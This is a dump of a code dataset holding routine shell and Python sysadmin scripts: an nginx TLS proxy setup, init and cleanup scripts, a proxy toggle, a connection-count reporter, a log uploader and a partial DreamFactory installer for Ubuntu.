blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
bcb643610bfa0c23931451d2de3a4c576d589f0b | Shell | aoggz/nginx-reverse-proxy | /startup.sh | UTF-8 | 1,761 | 3.421875 | 3 | [] | no_license | #!/bin/sh
set -e
# Script adapted from:
# https://myopswork.com/how-to-do-end-to-end-encryption-of-data-in-transit-b-w-aws-alb-and-ec2-3b7fd917cddd
# AND
# https://medium.com/@oliver.zampieri/self-signed-ssl-reverse-proxy-with-docker-dbfc78c05b41

# Generate a self-signed certificate/key pair for $DOMAIN under
# /etc/ssl/private, then render an nginx reverse-proxy config for
# $PROXY_ADDRESS and run nginx in the foreground.
echo "Generating SSL for $DOMAIN"
openssl version
mkdir -p /etc/ssl/private
chmod 700 /etc/ssl/private
cd /etc/ssl/private
echo "Generating key request for $DOMAIN"
openssl req -subj "/C=$COUNTRY/ST=$STATE/L=$LOCALITY/O=$ORGANIZATION/OU=$ORGANIZATIONAL_UNIT/CN=$DOMAIN/emailAddress=$EMAIL_ADDRESS" \
    -x509 -newkey rsa:4096 -nodes -keyout key.pem -out cert.pem -days 365

echo "Using proxy address of $PROXY_ADDRESS"

# Proxy timeout: 60s by default, overridable via $TIMEOUT_SECONDS.
# BUG FIX: the original read `if [! -z "$TIMEOUT_SECONDS" ]` — the missing
# space after '[' made the test an unknown command, so the override branch
# could never be taken.
timeout="60"
if [ -n "$TIMEOUT_SECONDS" ]
then
    timeout="$TIMEOUT_SECONDS"
fi

# Render the nginx configuration. Variables prefixed with \$ below are
# nginx runtime variables and must survive into the file unexpanded.
cat <<EOF > /etc/nginx/nginx.conf
worker_processes 4;
events { worker_connections 1024; }
http {
    sendfile on;
    upstream app_servers {
        server $PROXY_ADDRESS:80;
    }
    server {
        listen 443 ssl;
        server_name localhost;
        ssl_certificate /etc/ssl/private/cert.pem;
        ssl_certificate_key /etc/ssl/private/key.pem;
        location / {
            proxy_pass http://$PROXY_ADDRESS:80;
            proxy_http_version 1.1;
            proxy_set_header Upgrade \$http_upgrade;
            proxy_set_header Connection keep-alive;
            proxy_set_header Host \$host;
            proxy_buffer_size 128k;
            proxy_buffers 4 256k;
            proxy_busy_buffers_size 256k;
            proxy_connect_timeout $timeout;
            proxy_send_timeout $timeout;
            proxy_read_timeout $timeout;
            send_timeout $timeout;
        }
    }
}
EOF
# Start nginx
nginx -g 'daemon off;' | true |
6a72712036f816cc299b3a7f97e7783acaa61e94 | Shell | mudit1993/Practice-Programs | /OS Lab/Assignment1/months.sh | UTF-8 | 104 | 2.671875 | 3 | [] | no_license | echo Enter number of days
# Read a day count from stdin (the prompt is printed by the preceding
# line) and convert it to whole 30-day months plus leftover days.
read -r d
# Arithmetic expansion replaces the deprecated `expr` calls: no subshell
# fork, no escaped parentheses, and an empty input evaluates as 0 instead
# of aborting with an expr syntax error.
m=$((d / 30))
da=$((d - m * 30))
echo $m months $da days
| true |
8c19e4b81e38889f0195bab4b005ad0c5f3a5708 | Shell | harleybai/plc | /PLC | UTF-8 | 1,006 | 3.484375 | 3 | [] | no_license | #!/bin/sh /etc/rc.common
# PLC init.sh
# Copyright (C) 2017 Bai Shuangxing
START=10
STOP=15
execname=plc
pid=`ps |grep "$execname"|grep -v grep|wc -l`
# Start the daemon unless the start-up scan found it already running.
# NOTE(review): $pid is the process count captured in the global at script
# load time, so it can be stale if the process state changed afterwards.
start(){
	if [ $pid -lt 1 ]; then
		# Launch in the background, discarding stdout.
		$execname >/dev/null&
		echo "Starting $execname:[ OK ]"
	else
		# A matching process already exists — refuse a second instance.
		echo "Starting $execname:[ Failed ]"
	fi
}
# Stop the daemon if the start-up scan found it running.
# NOTE(review): relies on the global $pid captured at load time and kills
# with SIGKILL immediately (no SIGTERM grace period).
stop(){
	if [ $pid -gt 0 ]; then
		# Re-scan for live PIDs and SIGKILL every match.
		ps |grep "$execname"|grep -v grep|awk '{print $1}'|xargs kill -9
		echo "Stoping $execname:[ OK ]"
	else
		echo "Stoping $execname:[ Failed ]"
	fi
}
# Restart the daemon: kill-and-relaunch when it was seen running at load
# time, plain launch when it was not.
# NOTE(review): branches on the global $pid captured once at load time;
# the final else is unreachable for a non-negative process count.
restart(){
	if [ $pid -gt 0 ]; then
		# Running: SIGKILL all matching PIDs, wait briefly, relaunch.
		ps |grep "$execname"|grep -v grep|awk '{print $1}'|xargs kill -9
		echo "Stoping $execname:[ OK ]"
		sleep 1
		$execname >/dev/null&
		echo "Starting $execname:[ OK ]"
	elif [ $pid -eq 0 ]; then
		# Not running: just launch it.
		$execname >/dev/null&
		echo "Starting $execname:[ OK ]"
	else
		echo "Restarting $execname:[ Failed ]"
	fi
}
# Report whether $execname appears to be running, judged from the process
# count held in the global $pid captured at script load time.
status(){
	if [ $pid -ne 0 ]; then
		echo "$execname is running"
	else
		echo "$execname is not running"
	fi
}
| true |
80ee611a722b7e64ce2446cd9811f02266866751 | Shell | tribeiros/scripts | /uspeedy.sh | UTF-8 | 541 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# remove log from uspeedy
# tribeiros@indracompany.com - 07/2018

# Directories to clean
dirR='/home/tribeiros/Projects/scripts/rmlogr'
dirS='/home/tribeiros/Projects/scripts/rmlogs'

# Age threshold for find -mtime: a plus sign selects entries modified
# more than N days ago, a minus sign would select newer ones.
days=+7

# Verify both directories exist before deleting anything.
if [ -d "$dirR" ] && [ -d "$dirS" ]; then
    # Let find delete its own matches: unlike the original
    # `for f in $(find $dir/* ...)` loops this does not word-split paths
    # containing spaces and does not fail when a directory is empty
    # (an unmatched glob used to be passed to find literally).
    find "$dirR" -mindepth 1 -mtime "$days" -exec rm -rf {} +
    find "$dirS" -mindepth 1 -mtime "$days" -exec rm -rf {} +
else
    echo 'Directory not found'
fi
| true |
5c011a2739794ff1aca64a21b108730d40809fa4 | Shell | TerenceLiu98/server-and-openstack | /script/autoproxy.sh | UTF-8 | 641 | 3.109375 | 3 | [] | no_license | #/bin/bash
# Install the local proxy and ask which port it listens on.
brew install privoxy
echo -n "<- Enter your http/https PORT ->"
read -r PORT
echo "PORT = $PORT"

# Append proxy_on/proxy_off helpers to ~/.bash_profile.
# A here-doc replaces the original chain of echo commands, which had
# three bugs: one line was missing its '>> ~/.bash_profile' redirection
# (so the filename was printed instead of appended to), the nested double
# quotes around the status messages were unbalanced, and `echo "}\n"`
# wrote a literal backslash-n into the profile.
# $PORT is expanded now, so the generated functions carry the chosen port.
cat >> ~/.bash_profile <<EOF
function proxy_off(){
    unset http_proxy
    unset https_proxy
    echo -e "已关闭代理"
}

function proxy_on() {
    export http_proxy='http://localhost:$PORT'
    export https_proxy='http://localhost:$PORT'
    echo -e "已开启代理"
}
EOF
echo -n "done"
| true |
21360cb599b38667abb1197b012ae7143b1ff81c | Shell | roxor05/Programs | /Basic Bash scripting/case.sh | UTF-8 | 164 | 3.1875 | 3 | [] | no_license | #! /bin/bash
# First CLI argument selects the vehicle type to comment on.
vehicle=$1
# Dispatch on the requested vehicle (closing esac follows below).
case $vehicle in
"cars" )
	echo "car is just fine";;
"bikes" )
	echo "bikes are better";;
* )
	# Fallback for any unrecognised (or missing) argument.
	echo "not the correct option";;
esac | true |
f83d382aa6956f6daa38ee80912fdcdb9470bf5b | Shell | rcarreon/robc_main | /modules/varnish/files/pxy2app_connchk.sh | UTF-8 | 2,013 | 3.640625 | 4 | [] | no_license | #!/bin/bash
#
# /etc/cron.hourly/pxy2app_connchk.sh
# Dairenn Lombard <dairenn.lombard@gorillanation.com>
#
# 2011-07-28: Filter out localhost TCP:80
# 2011-07-27: Post IP addresses in the correct order.
# 2011-07-19: Initial Release
PATH=/usr/local/bin:/usr/local/sbin:/sbin:/bin:/usr/bin
#set -e
# Config options:
# Enable logging
enablelog="1"
# Run in "debug" mode
debug="0"
# Set URL of VIP Visualizer
targeturl="http://vipvisual.gnmedia.net"
######################
# #
# END CONFIG OPTIONS #
# #
######################
logdir="/var/log"
logfile="pxy_to_app.log"
logpath="$logdir/$logfile"
# Only an educated guess.
myip=`ifconfig eth0 | grep "inet addr" | cut -d ":" -f 2 | awk '{print $1}'`
if [ "$debug" = "1" ] ; then
port="8080"
echo ; echo "My IP address is $myip"
echo ; echo "My target URL is $targeturl:$port" ; echo
else
port="80"
fi
# 87.238.37.6 resolves to odd.varnish-software.com and varnish sometimes phones
# home for some reason.
# Walk every distinct remote peer with a socket to local port 80 (in any
# interesting TCP state) and report its connection count to the VIP
# Visualizer via an HTTP GET.
# NOTE(review): "(*WAIT|SYN*|ESTABLISHED)" is a dubious ERE — a leading
# '*' is undefined and "SYN*" matches "SY" plus zero or more 'N's; it
# works as a loose state filter under GNU grep, but verify before reuse.
for connection_ip in `netstat -an | egrep "(*WAIT|SYN*|ESTABLISHED)" | awk '{print $5}' | grep ":80$" | egrep -v "(127.0.0.1|87.238.37.6)" | cut -d ":" -f 1 | sort -n | uniq`
do
	# Count all sockets involving this peer address.
	# NOTE(review): a plain substring grep — could overcount if one
	# address is a prefix of another.
	conns=`netstat -an | grep $connection_ip | egrep "(*WAIT|SYN*|ESTABLISHED)" | wc -l`
	# One GET per peer reports proxy IP, app IP and connection count.
	curlarg="$targeturl:$port/insertNode?pxy_ip=$myip&app_ip=$connection_ip&conns=$conns&nodetype=pxy"
	curtime=`date "+%Y-%m-%d %H:%M:%S"`
	stamp="[$curtime]:"
	if [ "$enablelog" = "1" ] ; then
		# No out of control, abandoned log files; only keep what we need.
		if [ -f "$logpath" ] ; then
			# Remove the log once it is more than a day old.
			find $logpath -name "$logfile" -ctime +1 -exec rm -f {} \;
		fi
		echo -n "$stamp Transmitted HTTP Request: $curlarg with output from curl: " >> $logpath
		# Capture curl's stdout+stderr so the response lands in the log.
		VERBAGE=$( { curl "$curlarg"; } 2>&1 )
		echo $VERBAGE >> $logpath
		if [ "$debug" = "1" ] ; then
			tail -1 $logpath
		fi
	else
		# If not logging, just do this:
		if [ "$debug" = "1" ] ; then
			curl -v "$curlarg"
		else
			curl "$curlarg"
		fi
	fi
done
if [ "$debug" = "1" ] ; then
echo ; echo "Done." ; echo
fi
exit $?
| true |
3e5f37f6d01c14828c1f18f954941759ac5f7537 | Shell | lucaswannen/source_code_classification_with_CNN | /dataset_v2/bash/11709222.txt | UTF-8 | 259 | 2.6875 | 3 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
for path in `cat list.txt`; do
git add "$path"
git commit -am "autocommit"
done
.
~/bcg/credentials.txt
~/bcg/credentials.txt
fatal: pathspec 'bcg/versioned/~/bcg/credentials.txt' did not match any files
| true |
6e14753121c3965accd3a96092b59a1f735bebe2 | Shell | tiagompribeiro/scripts_util | /pcapreplay | UTF-8 | 580 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# Run on sudo su ROOT needed
# como correr ???? tcpreplay
#
# -k option will preload the PCAP file into memory before testing
# -t option will send as quickly as possible
# --loop to add a loop not implemented
helpFunction()
{
echo ""
echo "Usage: pcapreplay path_to_pcap eth_interface"
echo ""
exit 1 # Exit script after printing help
}
# Print helpFunction in case parameters are empty
if [ -z "$1" ] || [ -z "$2" ]
then
echo "";
echo "Some or all of the parameters are empty";
helpFunction
fi
sudo tcpreplay -i $2 -tK $1
#echo "1234567890"
| true |
446d89096e4be24cef58827e0218b522c1ee2755 | Shell | cms-sw/cms-bot | /logUpdater.py | UTF-8 | 7,001 | 2.703125 | 3 | [] | no_license | #!/bin/bash
""":"
python_cmd="python3"
python -V >/dev/null 2>&1 && python_cmd="python"
exec ${python_cmd} $0 ${1+"$@"}
"""
from __future__ import print_function
import os
from os.path import dirname, abspath, join
from cmsutils import doCmd, getIBReleaseInfo
from time import sleep
SCRIPT_DIR=dirname(abspath(__file__))
class LogUpdater(object):
    """Publishes IB build/test logs to the remote cmssdt web server.

    Every transfer goes through ssh/scp (runRemoteHostCmd / copy2RemoteHost);
    when dryRun is set the commands are only printed, not executed.
    """

    def __init__(self, dirIn=None, dryRun=False, remote=None, webDir="/data/sdt/buildlogs/"):
        """Derive the remote target directory from the release name.

        dirIn  -- local CMSSW build directory; its basename is the release.
        remote -- user@host destination; when omitted it is read from the
                  CMSSDT_SERVER= line of cmssdt.sh next to this script.
        webDir -- base directory of the buildlogs tree on the server.
        """
        if not remote:
            with open(join(SCRIPT_DIR,"cmssdt.sh")) as ref:
                remote = "cmsbuild@"+[ line.split("=")[-1].strip() for line in ref.readlines() if "CMSSDT_SERVER=" in line][0]
        self.dryRun = dryRun
        self.remote = remote
        self.cmsswBuildDir = dirIn
        rel = os.path.basename(dirIn)
        self.release = rel
        rc, day, hour = getIBReleaseInfo(rel)
        # Layout: <webDir>/<SCRAM_ARCH>/www/<day>/<rc>-<day>-<hour>/<release>
        self.webTargetDir = webDir + "/" + os.environ[
            "SCRAM_ARCH"] + "/www/" + day + "/" + rc + "-" + day + "-" + hour + "/" + self.release
        # Non-interactive ssh: fail fast rather than prompt for a password.
        self.ssh_opt = "-o CheckHostIP=no -o ConnectTimeout=60 -o ConnectionAttempts=5 -o StrictHostKeyChecking=no -o BatchMode=yes -o PasswordAuthentication=no"
        return

    def updateUnitTestLogs(self, subdir=""):
        """Copy the unit-test result files to webTargetDir[/subdir]."""
        print("\n--> going to copy unit test logs to", self.webTargetDir, '... \n')
        # copy back the test and relval logs to the install area
        # check size first ... sometimes the log _grows_ to tens of GB !!
        testLogs = ['unitTestLogs.zip', 'unitTests-summary.log', 'unitTestResults.pkl', 'unitTests1.log']
        for tl in testLogs:
            self.copyLogs(tl, '.', self.webTargetDir + "/" + subdir)
        return

    def updateGeomTestLogs(self):
        """Copy geometry test logs both to the root and to testLogs/."""
        print("\n--> going to copy Geom test logs to", self.webTargetDir, '... \n')
        testLogs = ['dddreport.log', 'domcount.log']
        for tl in testLogs:
            self.copyLogs(tl, '.', self.webTargetDir)
            self.copyLogs(tl, '.', os.path.join(self.webTargetDir, 'testLogs'))
        return

    def updateDupDictTestLogs(self):
        """Copy duplicate-dictionary check logs (glob pattern)."""
        print("\n--> going to copy dup dict test logs to", self.webTargetDir, '... \n')
        testLogs = ['dupDict-*.log']
        for tl in testLogs:
            self.copyLogs(tl, '.', self.webTargetDir)
            self.copyLogs(tl, '.', os.path.join(self.webTargetDir, 'testLogs'))
        return

    def updateLogFile(self, fileIn, subTrgDir=None):
        """Copy a single log file to webTargetDir, or a subdirectory of it."""
        desdir = self.webTargetDir
        if subTrgDir: desdir = os.path.join(desdir, subTrgDir)
        print("\n--> going to copy " + fileIn + " log to ", desdir, '... \n')
        self.copyLogs(fileIn, '.', desdir)
        return

    def updateCodeRulesCheckerLogs(self):
        """Copy the cms code-rules checker output directory."""
        print("\n--> going to copy cms code rules logs to", self.webTargetDir, '... \n')
        self.copyLogs('codeRules', '.', self.webTargetDir)
        return

    def updateRelValMatrixPartialLogs(self, partialSubDir, dirToSend):
        """Copy one partial relval-matrix log dir and mark it with wf.done."""
        destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs')
        print("\n--> going to copy pyrelval partial matrix logs to", destination, '... \n')
        self.copyLogs(dirToSend, partialSubDir, destination)
        # The marker file signals remote consumers that this workflow's
        # upload is complete (see getDoneRelvals/relvalAlreadyDone).
        self.runRemoteCmd("touch " + os.path.join(destination, dirToSend, "wf.done"))
        return

    def getDoneRelvals(self):
        """Return the workflow ids whose remote wf.done marker exists."""
        wfDoneFile = "wf.done"
        destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs', "*", wfDoneFile)
        code, out = self.runRemoteCmd("ls " + destination, debug=False)
        # Directory names look like <wfid>_<...>; keep the id part only.
        return [ wf.split("/")[-2].split("_")[0] for wf in out.split("\n") if wf.endswith(wfDoneFile)]

    def relvalAlreadyDone(self, wf):
        """True when the wf.done marker for workflow wf exists remotely."""
        wfDoneFile = "wf.done"
        destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs', str(wf) + "_*", wfDoneFile)
        code, out = self.runRemoteCmd("ls -d " + destination)
        return ((code == 0) and out.endswith(wfDoneFile))

    def updateAddOnTestsLogs(self):
        """Copy the addOn test log, zip and pickle to their web locations."""
        print("\n--> going to copy addOn logs to", self.webTargetDir, '... \n')
        self.copyLogs('addOnTests.log', '.', self.webTargetDir)
        self.copyLogs('addOnTests.zip', 'addOnTests/logs', self.webTargetDir)
        self.copyLogs('addOnTests.pkl', 'addOnTests/logs', os.path.join(self.webTargetDir, 'addOnTests/logs'))
        return

    def updateIgnominyLogs(self):
        """Copy ignominy dependency-analysis outputs from igRun/."""
        print("\n--> going to copy ignominy logs to", self.webTargetDir, '... \n')
        testLogs = ['dependencies.txt.gz', 'products.txt.gz', 'logwarnings.gz', 'metrics']
        for tl in testLogs:
            self.copyLogs(tl, 'igRun', os.path.join(self.webTargetDir, 'igRun'))
        return

    def updateProductionRelValLogs(self, workFlows):
        """Copy the production relval log plus per-workflow timing files."""
        print("\n--> going to copy Production RelVals logs to", self.webTargetDir, '... \n')
        wwwProdDir = os.path.join(self.webTargetDir, 'prodRelVal')
        self.copyLogs('prodRelVal.log', '.', wwwProdDir)
        for wf in workFlows:
            self.copyLogs('timingInfo.txt', 'prodRelVal/wf/' + wf, os.path.join(wwwProdDir, 'wf', wf))
        return

    def updateBuildSetLogs(self, appType='fwlite'):
        """Copy BuildSet logs for the given application type."""
        print("\n--> going to copy BuildSet logs to", self.webTargetDir, '... \n')
        wwwBSDir = os.path.join(self.webTargetDir, 'BuildSet')
        self.copyLogs(appType, 'BuildSet', wwwBSDir)
        return

    def copyLogs(self, what, logSubDir="", tgtDirIn=None):
        """Create the remote target dir and scp `what` from the build area."""
        if not tgtDirIn: tgtDirIn = self.webTargetDir
        self.runRemoteCmd("mkdir -p " + tgtDirIn)
        self.copy2Remote(os.path.join(self.cmsswBuildDir, logSubDir, what), tgtDirIn + "/")

    def runRemoteCmd(self, cmd, debug=True):
        """Run cmd on the default remote host (self.remote)."""
        return self.runRemoteHostCmd(cmd, self.remote, debug=debug)

    def copy2Remote(self, src, des):
        """Copy src to des on the default remote host (self.remote)."""
        return self.copy2RemoteHost(src, des, self.remote)

    def runRemoteHostCmd(self, cmd, host, debug=True):
        """Run a command over ssh with retries.

        Retries up to 10 times (60 s apart) while the attempt fails without
        the CONNECTION=OK echo (i.e. the ssh connection itself failed), then
        makes one final attempt. Returns the (err, out) pair from doCmd, or
        (1, message) on an exception.
        NOTE(review): in dryRun mode the command is only printed and the
        method implicitly returns None — confirm callers tolerate that.
        """
        cmd = "ssh -Y " + self.ssh_opt + " " + host + " 'echo CONNECTION=OK && " + cmd + "'"
        try:
            if self.dryRun:
                print("CMD>>", cmd)
            else:
                for i in range(10):
                    err, out = doCmd(cmd, debug=debug)
                    if not err: return (err, out)
                    # CONNECTION=OK in the output means ssh reached the host,
                    # so the failure came from the command itself: report it.
                    for l in out.split("\n"):
                        if "CONNECTION=OK" in l: return (err, out)
                    sleep(60)
                return doCmd(cmd, debug=debug)
        except Exception as e:
            print("Ignoring exception during runRemoteCmd:", str(e))
            return (1, str(e))

    def copy2RemoteHost(self, src, des, host):
        """Recursively scp src to host:des with up to 10 retries.

        Returns the (err, out) pair from doCmd, or (1, message) on an
        exception. In dryRun mode the command is only printed (returns None).
        """
        cmd = "scp " + self.ssh_opt + " -r " + src + " " + host + ":" + des
        try:
            if self.dryRun:
                print("CMD>>", cmd)
            else:
                for i in range(10):
                    err, out = doCmd(cmd)
                    if not err: return (err, out)
                    sleep(60)
                return doCmd(cmd)
        except Exception as e:
            print("Ignoring exception during copy2Remote:", str(e))
            return (1, str(e))
| true |
e3be33c13d6a0750cc52d07cda568fcfa2ac8387 | Shell | walm/dotfiles | /exports | UTF-8 | 694 | 2.546875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# environment
export EDITOR="nvim"
export TERMINAL="urxvt"
export BROWSER="firefox-developer-edition"
# history
# remove duplicates from history
export HISTCONTROL=erasedups
# keep a lot in history
export HISTSIZE=50000
# commands to not show in history
export HISTIGNORE=" *:ls:cd:cd -:pwd:exit:date:* --help:* -h"
# locale
export LANG="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"
# don’t clear the screen after man
export MANPAGER="less -X"
# gtk hidpi
if [[ -n "$RETINA" ]]; then
export GDK_SCALE=2
export GDK_DPI_SCALE=0.5
export QT_DEVICE_PIXEL_RATIO=2
fi
# clipmenu use rofi
export CM_LAUNCHER=rofi
# go vendoring
export GO15VENDOREXPERIMENT=1
export GOMAXPROCS=1
| true |
b5ea6deb66818dc07669875a488fc06e63c90ceb | Shell | sunlibo111111/dreamfactory | /installers/ubuntu.sh | UTF-8 | 35,776 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Colors schemes for echo:
RD='\033[0;31m' #Red
GN='\033[0;32m' #Green
MG='\033[0;95m' #Magenta
NC='\033[0m' # No Color
DEFAULT_PHP_VERSION="php7.2"
CURRENT_OS=$(cat /etc/os-release | grep VERSION_ID | cut -d "=" -f 2 | cut -c 2-3)
ERROR_STRING="Installation error. Exiting"
CURRENT_PATH=$(pwd)
# CHECK FOR KEYS
while [[ -n $1 ]]
do
case "$1" in
--with-oracle) ORACLE=TRUE;;
--with-mysql) MYSQL=TRUE;;
--with-apache) APACHE=TRUE;;
--with-db2) DB2=TRUE;;
--with-cassandra) CASSANDRA=TRUE;;
--debug) DEBUG=TRUE;;
--help) HELP=TRUE;;
-h) HELP=TRUE;;
*) echo -e "\n${RD}Invalid flag detected… aborting.${NC}"
HELP=TRUE
break;;
esac
shift
done
if [[ $HELP == TRUE ]]
then
echo -e "\nList of available keys:\n"
echo " --with-oracle Install driver and PHP extensions for work with Oracle DB"
echo " --with-mysql Install MariaDB as default system database for DreamFactory"
echo " --with-apache Install Apache2 web server for DreamFactory"
echo " --with-db2 Install driver and PHP extensions for work with IBM DB2"
echo " --with-cassandra Install driver and PHP extensions for work with Cassandra DB"
echo " --debug Enable installation process logging to file in /tmp folder."
echo -e " -h, --help Show this help\n"
exit 1
fi
if [[ ! $DEBUG == TRUE ]]
then
exec 5>&1 # Save a copy of STDOUT
exec > /dev/null 2>&1 # Redirect STDOUT to Null
else
exec 5>&1 # Save a copy of STDOUT. Used because all echo redirects output to 5.
exec > /tmp/dreamfactory_installer.log 2>&1
fi
clear >&5
# Make sure script run as sudo
if (( $EUID != 0 ));
then
echo -e "${RD}\nPlease run script with sudo: sudo bash $0 \n${NC}" >&5
exit 1
fi
# Retrieve executing user's username
CURRENT_USER=$(logname)
if [[ -z $SUDO_USER ]] && [[ -z $CURRENT_USER ]]
then
echo -e "${RD} Enter username for installation DreamFactory:${NC}" >&5
read CURRENT_USER
fi
if [[ ! -z $SUDO_USER ]]
then
CURRENT_USER=${SUDO_USER}
fi
### STEP 1. Install system dependencies
echo -e "${GN}Step 1: Installing system dependencies...\n${NC}" >&5
apt-get update
apt-get install -y git \
curl \
zip \
unzip \
ca-certificates \
apt-transport-https \
software-properties-common \
lsof \
libmcrypt-dev \
libreadline-dev
# Check installation status
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}The system dependencies have been successfully installed.\n${NC}" >&5
### Step 2. Install PHP
echo -e "${GN}Step 2: Installing PHP...\n${NC}" >&5
PHP_VERSION=$(php --version 2> /dev/null | head -n 1 | cut -d " " -f 2 | cut -c 1,3 )
MCRYPT=0
if [[ $PHP_VERSION =~ ^-?[0-9]+$ ]]
then
if (( $PHP_VERSION == 71 ))
then
PHP_VERSION=php7.1
MCRYPT=1
else
PHP_VERSION=${DEFAULT_PHP_VERSION}
fi
else
PHP_VERSION=${DEFAULT_PHP_VERSION}
fi
PHP_VERSION_INDEX=$(echo $PHP_VERSION | cut -c 4-6)
# Install the php repository
add-apt-repository ppa:ondrej/php -y
# Update the system
apt-get update
apt-get install -y ${PHP_VERSION}-common \
${PHP_VERSION}-xml \
${PHP_VERSION}-cli \
${PHP_VERSION}-curl \
${PHP_VERSION}-json \
${PHP_VERSION}-mysqlnd \
${PHP_VERSION}-sqlite \
${PHP_VERSION}-soap \
${PHP_VERSION}-mbstring \
${PHP_VERSION}-zip \
${PHP_VERSION}-bcmath \
${PHP_VERSION}-dev \
${PHP_VERSION}-ldap \
${PHP_VERSION}-pgsql \
${PHP_VERSION}-interbase \
${PHP_VERSION}-sybase
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}${PHP_VERSION} installed.\n${NC}" >&5
### Step 3. Install Apache
if [[ $APACHE == TRUE ]] ### Only with key --apache
then
echo -e "${GN}Step 3: Installing Apache...\n${NC}" >&5
# Check Apache installation status
ps aux | grep -v grep | grep apache2
CHECK_APACHE_PROCESS=$(echo $?)
dpkg -l | grep apache2 | cut -d " " -f 3 | grep -E "apache2$"
CHECK_APACHE_INSTALLATION=$(echo $?)
if (( $CHECK_APACHE_PROCESS == 0 )) || (( $CHECK_APACHE_INSTALLATION == 0 ))
then
echo -e "${RD}Apache2 detected. Skipping installation. Configure Apache2 manually.\n${NC}" >&5
else
# Install Apache
# Check if running web server on port 80
lsof -i :80 | grep LISTEN
if (( $? == 0 ))
then
echo -e "${RD}Port 80 taken.\n ${NC}" >&5
echo -e "${RD}Skipping installation Apache2. Install Apache2 manually.\n ${NC}" >&5
else
apt-get -qq install -y apache2 libapache2-mod-${PHP_VERSION}
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install Apache. Exiting.${NC}" >&5
exit 1
fi
a2enmod rewrite
echo "extension=pdo_sqlsrv.so" >> /etc/php/${PHP_VERSION_INDEX}/apache2/conf.d/30-pdo_sqlsrv.ini
echo "extension=sqlsrv.so" >> /etc/php/${PHP_VERSION_INDEX}/apache2/conf.d/20-sqlsrv.ini
# Create apache2 site entry
WEB_PATH=/etc/apache2/sites-available/000-default.conf
echo '<VirtualHost *:80>' > $WEB_PATH
echo 'DocumentRoot /opt/dreamfactory/public' >> $WEB_PATH
echo '<Directory /opt/dreamfactory/public>' >> $WEB_PATH
echo 'AddOutputFilterByType DEFLATE text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript' >> $WEB_PATH
echo 'Options -Indexes +FollowSymLinks -MultiViews' >> $WEB_PATH
echo 'AllowOverride All' >> $WEB_PATH
echo 'AllowOverride None' >> $WEB_PATH
echo 'Require all granted' >> $WEB_PATH
echo 'RewriteEngine on' >> $WEB_PATH
echo 'RewriteBase /' >> $WEB_PATH
echo 'RewriteCond %{REQUEST_FILENAME} !-f' >> $WEB_PATH
echo 'RewriteCond %{REQUEST_FILENAME} !-d' >> $WEB_PATH
echo 'RewriteRule ^.*$ /index.php [L]' >> $WEB_PATH
echo '<LimitExcept GET HEAD PUT DELETE PATCH POST>' >> $WEB_PATH
echo 'Allow from all' >> $WEB_PATH
echo '</LimitExcept>' >> $WEB_PATH
echo '</Directory>' >> $WEB_PATH
echo '</VirtualHost>' >> $WEB_PATH
service apache2 restart
echo -e "${GN}Apache2 installed.\n${NC}" >&5
fi
fi
else
echo -e "${GN}Step 3: Installing Nginx...\n${NC}" >&5 ### Default choice
# Check nginx installation in the system
ps aux | grep -v grep | grep nginx
CHECK_NGINX_PROCESS=$(echo $?)
dpkg -l | grep nginx | cut -d " " -f 3 | grep -E "nginx$"
CHECK_NGINX_INSTALLATION=$(echo $?)
if (( $CHECK_NGINX_PROCESS == 0 )) || (( $CHECK_NGINX_INSTALLATION == 0 ))
then
echo -e "${RD}Nginx detected. Skipping installation. Configure Nginx manually.\n${NC}" >&5
else
# Install nginx
# Checking running web server
lsof -i :80 | grep LISTEN
if (( $? == 0 ))
then
echo -e "${RD}Port 80 taken.\n ${NC}" >&5
echo -e "${RD}Skipping Nginx installation. Install Nginx manually.\n ${NC}" >&5
else
apt-get install -y nginx ${PHP_VERSION}-fpm
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install Nginx. Exiting.${NC}" >&5
exit 1
fi
# Change php fpm configuration file
sed -i 's/\;cgi\.fix\_pathinfo\=1/cgi\.fix\_pathinfo\=0/' $(php -i|sed -n '/^Loaded Configuration File => /{s:^.*> ::;p;}'| sed 's/cli/fpm/')
# Create nginx site entry
WEB_PATH=/etc/nginx/sites-available/default
echo 'server {' > $WEB_PATH
echo 'listen 80 default_server;' >> $WEB_PATH
echo 'listen [::]:80 default_server ipv6only=on;' >> $WEB_PATH
echo 'root /opt/dreamfactory/public;' >> $WEB_PATH
echo 'index index.php index.html index.htm;' >> $WEB_PATH
echo 'server_name server_domain_name_or_IP;' >> $WEB_PATH
echo 'gzip on;' >> $WEB_PATH
echo 'gzip_disable "msie6";' >> $WEB_PATH
echo 'gzip_vary on;' >> $WEB_PATH
echo 'gzip_proxied any;' >> $WEB_PATH
echo 'gzip_comp_level 6;' >> $WEB_PATH
echo 'gzip_buffers 16 8k;' >> $WEB_PATH
echo 'gzip_http_version 1.1;' >> $WEB_PATH
echo 'gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;' >> $WEB_PATH
echo 'location / {' >> $WEB_PATH
echo 'try_files $uri $uri/ /index.php?$args;}' >> $WEB_PATH
echo 'error_page 404 /404.html;' >> $WEB_PATH
echo 'error_page 500 502 503 504 /50x.html;' >> $WEB_PATH
echo 'location = /50x.html {' >> $WEB_PATH
echo 'root /usr/share/nginx/html;}' >> $WEB_PATH
echo 'location ~ \.php$ {' >> $WEB_PATH
echo 'try_files $uri =404;' >> $WEB_PATH
